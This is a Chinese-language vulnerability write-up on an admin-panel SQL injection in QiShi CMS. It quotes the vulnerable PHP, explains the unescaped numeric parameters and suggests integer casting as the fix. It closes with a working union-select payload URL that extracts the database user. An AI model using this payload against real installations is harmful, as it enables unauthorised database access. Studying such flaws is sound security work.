
    骑士CMS后台SQL注入

    7shad0w发表于 2016-07-08 13:35:37

    漏洞文件：admin/admin_feedback.php（位于后台目录，利用前提是已经拥有后台登录权限，属于后台 SQL 注入）

    第 82 行附近的代码如下（$wheresql 由 $_GET 参数直接拼接而成）：

             if (!empty($_GET['reporttype']))
    
             {
    
                       $wheresql=empty($wheresql)?" WHERE r.report_type=".$_GET['reporttype']:$wheresql." AND r.report_type=".$_GET['reporttype'];
    
             }
    
             if (!empty($_GET['audit']))
    
             {
    
                       $wheresql=empty($wheresql)?" WHERE r.audit=".$_GET['audit']:$wheresql." AND r.audit=".$_GET['audit'];
    
             }
    
             $total_val=$db->get_total($total_sql);
    
             $page = new page(array('total'=>$total_val, 'perpage'=>$perpage,'getarray'=>$_GET));
    
             $currenpage=$page->nowindex;
    
             $offset=($currenpage-1)*$perpage;
    
             $list = get_report_list($offset,$perpage,$joinsql.$wheresql.$oederbysql,$type);
    
             $smarty->assign('pageheader',"举报信息");
    
             $smarty->assign('list',$list);
    
             $smarty->assign('page',$page->show(3));

     

    跟进 get_report_list 函数，看这段拼接好的 SQL 片段是如何被执行的：

     

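    /**
     * Fetch one page of reports for the admin report list.
     *
     * @param int    $offset  Row offset for the LIMIT clause (cast to int here).
     * @param int    $perpage Rows per page for the LIMIT clause (cast to int here).
     * @param string $get_sql JOIN / WHERE / ORDER BY fragment appended verbatim to
     *                        the query. It is NOT escaped here, so the caller must
     *                        build it only from trusted or already-sanitised values;
     *                        the admin_feedback.php injection is exactly this
     *                        fragment carrying raw $_GET data.
     * @param mixed  $type    1 selects job reports (table 'report', adds 'jobs_url');
     *                        anything else selects resume reports (table
     *                        'report_resume', adds 'resume_url'). Loose comparison is
     *                        kept on purpose because callers may pass a string.
     * @return array List of rows. Returns an empty array when nothing matches (the
     *               original returned an undefined variable, i.e. null).
     */
    function get_report_list($offset,$perpage,$get_sql= '',$type)
    {
        global $db;
        $row_arr = array();
        // Pagination values are integers by contract; cast them so a non-numeric
        // value can never reach the LIMIT clause.
        $limit = " LIMIT ".(int)$offset.','.(int)$perpage;
        if ($type == 1) {
            $table   = table('report');
            $id_key  = 'jobs_id';
            $url_key = 'jobs_url';
            $route   = 'QS_jobsshow';
        } else {
            $table   = table('report_resume');
            $id_key  = 'resume_id';
            $url_key = 'resume_url';
            $route   = 'QS_resumeshow';
        }
        // m.username only resolves if $get_sql supplies a JOIN with alias m.
        $result = $db->query("SELECT r.*,m.username FROM ".$table." AS r ".$get_sql.$limit);
        while ($row = $db->fetch_array($result)) {
            $row[$url_key] = url_rewrite($route, array('id'=>$row[$id_key]));
            $row_arr[] = $row;
        }
        return $row_arr;
    }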

     

    `$_GET['reporttype']` 和 `$_GET['audit']` 既没有用引号包裹，也没有经过 intval() 之类的过滤，就被原样拼接进 WHERE 子句，随后在 get_report_list 中直接执行。因此这是数字型注入，无需闭合引号即可注入；修复方式是在拼接前对这两个参数做整型转换。

     

    构造 payload（需先以后台管理员身份登录；union select 的列数必须与被查询表的实际列数一致，下面以 10 列为例，实际列数需根据目标版本调整）：

    admin/admin_feedback.php?act=report_list&audit=1%20union%20select%201,2,3,4,5,6,7,user(),9,10%23



